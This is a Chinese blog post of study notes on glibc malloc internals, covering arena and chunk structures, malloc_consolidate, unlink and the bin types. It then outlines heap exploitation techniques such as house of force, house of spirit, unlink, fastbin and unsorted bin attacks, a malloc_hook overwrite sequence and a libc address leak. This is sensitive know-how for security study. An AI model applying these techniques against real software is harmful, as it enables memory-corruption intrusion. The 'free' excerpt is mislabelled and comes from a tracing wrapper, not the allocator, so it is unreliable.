Malloc和堆利用

1、函数执行流程
void * malloc(size_t bytes)
        void *__libc_malloc (size_t bytes)
            __malloc_hook 
            void * _int_malloc (mstate av, size_t bytes)
2、相关结构体分析
  • malloc_state
/*
		   have_fastchunks indicates that there are probably some fastbin chunks.
		   It is set true on entering a chunk into any fastbin, and cleared early in
		   malloc_consolidate.  The value is approximate since it may be set when there
		   are no fastbin chunks, or it may be clear even if there are fastbin chunks
		   available.  Given it's sole purpose is to reduce number of redundant calls to
		   malloc_consolidate, it does not affect correctness.  As a result we can safely
		   use relaxed atomic accesses.
		 */
		
		struct malloc_state
		{
		  /* Serialize access.  */
		  __libc_lock_define (, mutex);          //0x4 
		
		  /* Flags (formerly in max_fast).  */
		  int flags;							//0x8
		
		  /* Set if the fastbin chunks contain recently inserted free blocks.  */
		  /* Note this is a bool but not all targets support atomics on booleans.  */
		  int have_fastchunks;  			//0xc
		
		  /* Fastbins */ 
		  mfastbinptr fastbinsY[NFASTBINS];   //fastbin 的管理头  10个 // 0x10  
		
		  /* Base of the topmost chunk -- not otherwise kept in a bin */
		  mchunkptr top;				// 0x60  96
		
		  /* The remainder from the most recent split of a small request */
		  mchunkptr last_remainder;
		
		  /* Normal bins packed as described above */
		  mchunkptr bins[NBINS * 2 - 2];                          
		
		  /* Bitmap of bins */
		  unsigned int binmap[BINMAPSIZE];
		
		  /* Linked list */
		  struct malloc_state *next;
		
		  /* Linked list for free arenas.  Access to this field is serialized
		     by free_list_lock in arena.c.  */
		  struct malloc_state *next_free;
		
		  /* Number of threads attached to this arena.  0 if the arena is on
		     the free list.  Access to this field is serialized by
		     free_list_lock in arena.c.  */
		  INTERNAL_SIZE_T attached_threads;
		
		  /* Memory allocated from the system in this arena.  */
		  INTERNAL_SIZE_T system_mem;
		  INTERNAL_SIZE_T max_system_mem;
		}
  • malloc_chunk
    /*
    	  This struct declaration is misleading (but accurate and necessary).
    	  It declares a "view" into memory allowing access to necessary
    	  fields at known offsets from a given base. See explanation below.
    	*/
    	
    	chunk size=0x20 when malloc(0)
    	
    	struct malloc_chunk {
    	
    	  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */ //如果为空返回当前size大小
    	  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */  //chunk的大小
    	
    	  struct malloc_chunk* fd;         /* double links -- used only if free. */
    	  struct malloc_chunk* bk;
    	
    	  /* Only used for large blocks: pointer to next larger size.  */
    	  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
    	  struct malloc_chunk* bk_nextsize;
    	};
    main_arena	/* There are several instances of this struct ("arenas") in this
    	   malloc.  If you are adapting this malloc in a way that does NOT use
    	   a static or mmapped malloc_state, you MUST explicitly zero-fill it
    	   before using. This malloc relies on the property that malloc_state
    	   is initialized to all zeroes (as is true of C statics).  */
    	
    	static struct malloc_state main_arena =
    	{
    	  .mutex = _LIBC_LOCK_INITIALIZER,
    	  .next = &main_arena,
    	  .attached_threads = 1
    	};
    
  • malloc_consolidate
/* ------------------------- malloc_consolidate -------------------------
		
		  malloc_consolidate is a specialized version of free() that tears
		  down chunks held in fastbins.  Free itself cannot be used for this
		  purpose since, among other things, it might place chunks back onto
		  fastbins.  So, instead, we need to use a minor variant of the same
		  code.
		*/
		
		static void malloc_consolidate(mstate av)
		{
		  mfastbinptr*    fb;                 /* current fastbin being consolidated */
		  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
		  mchunkptr       p;                  /* current chunk being consolidated */
		  mchunkptr       nextp;              /* next chunk to consolidate */
		  mchunkptr       unsorted_bin;       /* bin header */
		  mchunkptr       first_unsorted;     /* chunk to link to */
		
		  /* These have same use as in free() */
		  mchunkptr       nextchunk;
		  INTERNAL_SIZE_T size;
		  INTERNAL_SIZE_T nextsize;
		  INTERNAL_SIZE_T prevsize;
		  int             nextinuse;
		  mchunkptr       bck;
		  mchunkptr       fwd;
		
		  atomic_store_relaxed (&av->have_fastchunks, false);
		
		  unsorted_bin = unsorted_chunks(av);
		
		  /*
		    Remove each chunk from fast bin and consolidate it, placing it
		    then in unsorted bin. Among other reasons for doing this,
		    placing in unsorted bin avoids needing to calculate actual bins
		    until malloc is sure that chunks aren't immediately going to be
		    reused anyway.
		  */
		
		  maxfb = &fastbin (av, NFASTBINS - 1);
		  fb = &fastbin (av, 0);
		  do {
		    p = atomic_exchange_acq (fb, NULL);
		    if (p != 0) {
		      do {
		        {
		          unsigned int idx = fastbin_index (chunksize (p));
		          if ((&fastbin (av, idx)) != fb)
		            malloc_printerr ("malloc_consolidate(): invalid chunk size");
		        }
		
		        check_inuse_chunk(av, p);
		        nextp = p->fd;
		
		        /* Slightly streamlined version of consolidation code in free() */
		        size = chunksize (p);
		        nextchunk = chunk_at_offset(p, size);
		        nextsize = chunksize(nextchunk);
		
		        if (!prev_inuse(p)) {
		          prevsize = prev_size (p);
		          size += prevsize;
		          p = chunk_at_offset(p, -((long) prevsize));
		          unlink(av, p, bck, fwd);
		        }
		
		        if (nextchunk != av->top) {
		          nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
		
		          if (!nextinuse) {
		            size += nextsize;
		            unlink(av, nextchunk, bck, fwd);
		          } else
		            clear_inuse_bit_at_offset(nextchunk, 0);
		
		          first_unsorted = unsorted_bin->fd;
		          unsorted_bin->fd = p;
		          first_unsorted->bk = p;
		
		          if (!in_smallbin_range (size)) {
		            p->fd_nextsize = NULL;
		            p->bk_nextsize = NULL;
		          }
		
		          set_head(p, size | PREV_INUSE);
		          p->bk = unsorted_bin;
		          p->fd = first_unsorted;
		          set_foot(p, size);
		        }
		
		        else {
		          size += nextsize;
		          set_head(p, size | PREV_INUSE);
		          av->top = p;
		        }
		
		      } while ( (p = nextp) != 0);
		
		    }
		  } while (fb++ != maxfb);
		}
  • free 函数结构:
/* `free' replacement.  We keep track of the memory usage if this is the
		   correct program.  */
		void free (void *ptr)
		{
		  struct header *real;
		
		  /* `free (NULL)' has no effect.  */
		  if (ptr == NULL)
		    {
		      ++calls[idx_free];
		      return;
		    }
		
		  /* Determine real implementation if not already happened.  */
		  if (freep == NULL)
		    {
		      me ();
		      freep = (void (*) (void *)) dlsym (RTLD_NEXT, "free");
		    }
		
		  /* If this is not the correct program just use the normal function.  */
		  if (not_me)
		    {
		      (*freep) (ptr);
		      return;
		    }
		
		  /* Determine the pointer to the header.  */
		  real = ((struct header *) ptr) - 1;
		  if (real->magic != MAGIC)
		    {
		      /* This block wasn't allocated here.  */
		      (*freep) (ptr);
		      return;
		    }
		
		  /* Keep track of number of calls.  */
		  ++calls[idx_free];
		  /* Keep track of total memory freed using `free'.  */
		  total[idx_free] += real->length;
		
		  /* Update the allocation data and write out the records if necessary.  */
		  update_data (NULL, 0, real->length);
		
		  /* Do the real work.  */
		  (*freep) (real);
		}
  • unlink
#define unlink(AV, P, BK, FD) {                                            \
		    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
		      malloc_printerr ("corrupted size vs. prev_size");			      \
		    FD = P->fd;								      \
		    BK = P->bk;								      \
		    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
		      malloc_printerr ("corrupted double-linked list");			      \
		    else {								      \
		        FD->bk = BK;							      \
		        BK->fd = FD;							      \
		        if (!in_smallbin_range (chunksize_nomask (P))			      \
		            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
		            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
		                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
		              malloc_printerr ("corrupted double-linked list (not small)");   \
		            if (FD->fd_nextsize == NULL) {				      \
		                if (P->fd_nextsize == P)				      \
		                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
		                else {							      \
		                    FD->fd_nextsize = P->fd_nextsize;			      \
		                    FD->bk_nextsize = P->bk_nextsize;			      \
		                    P->fd_nextsize->bk_nextsize = FD;			      \
		                    P->bk_nextsize->fd_nextsize = FD;			      \
		                  }							      \
		              } else {							      \
		                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
		                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
		              }								      \
		          }								      \
		      }									      \
		}

  • malloc​(0)会申请0x20的空间
fastbin          0x20---0x80     (prev_inuse位永远为1)
smallbin         0x20--0x400
unsortedbin      未分类
largebin          >0x400

fd_nextsize  bk_nextsize   在创建大于0x400时才会用到
main_arean  ------>管理所有bin链的一个结构   
fd---->顺时针链     bk-------->逆时针的链
3.总结:
1. 分配堆块是基于main_arena来寻址的,首先找的是fastbin,其次再找bins
2. 64位chunk的size必须是16字节对齐 2*SIZE_T 32位chunk的size必须是8字节对齐 2*SIZE_T
3. prev_size位是可以被共享的  0x18 可以共享下一个堆快的prev_size
4. 堆利用的核心思想,在释放了chunk的时候还能够修改
5. 当chunk被释放到unsorted bin ,当前chunk内就有libc上的地址      lib.address=libc_on-libc.symbols["main_arena"] - 88
6. fastbin 的prev_size为0 prev_inuse为1 
7. malloc_consolidate 会整理fastbin ,将能合并的fastbin 合并 一起放入到unsorted bin  在unsoreted bin malloc的最后,会将unsorted bin上的堆块进行整理,并放入到对应的bin中 
8. 0xdeadbeef ,gdb中使用search -4 0xdeadbeef
9. 当top chunk大小不能满足当前堆块的大小了 ,会调用sbrk系统调用新创建top chunk,之前的不够块会被分配到unsorted bin 。  HOUSE OF ORANGE 
10.当fastbin中有chunk可以满足需求,再次malloc的时候不会访问unsorted bin
11.有任意一个块,被放入了除了fastbin的一个bin中,其中就含有libc上的地址 



bck = fwd->bk;
​
bck=target -0x10
​
*(target) = victim
​
fwd->bk_nextsize = target -0x20
​
victim->bk_nextsize = target  
​
*(target ) =victim 
​
victim->bk = target -0x10
​
*(target ) =unsorted_chunks (av)

  • bins结构
    1.unsorted bin 没有排序
    2.2到63为small bin 每个small bin中的chunk的size都相同 ,相邻的两个链中长度相差2个机器字长
    fastbin
    1.set_max_fast (DEFAULT_MXFAST);在malloc_init_state 会调用set_max_fast 设置fastbin chunk的最大值
    2.LIFO 后进的先出,从main_arena开始遍历
    3.chunk的inuse位 始终为1
    4.单链表结构
    small bin
    1.一共62个bin链 ,每个链表中的大小都一致 size = 2 * SIZE *index (0x20 --0x400)64位
    2.FIFO
    3.inuse 如果前一个堆快释放置为0
    //unsorted bin
    在这里插入图片描述
堆利用
1. house of force
   1. 通过堆溢出或者其他方式,更改top chunk的大小,能够自由控制堆分配的尺寸大小

2. house of spirit
   1. 通过free达到任意地址写的目的
   * 利用条件:
     在目标周围可以伪造一个堆快
     能够对伪造的堆块附近进行一次free
     free后还能够重新申请得到这个堆块并篡改目标地址内容

3. unlink 利用
   1. *q = q -0x10
      *q = q-0x18
      	4.fastbin_attack
	1.do_check_remalloced_chunk必须是0xnf----0x7f
	2.malloc_hook-0x23
	
5.unsorted bin attack
	
	
	
6.unsorted bin attack + fastbin_attack
	1.malloc fastbin 0x70
	2.free 0x70
	3.change fd ---->target 
	4.malloc 0x100
	5.free 0x100
	6.change 0x100 -addr +0x8 --->target 
	7.malloc 0x100
	8.malloc 0x70
	9.malloc 0x70  _get target chunk

在这里插入图片描述
small bin 从unsorted bin进入没有unlink
在这里插入图片描述
在这里插入图片描述

总结:

在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值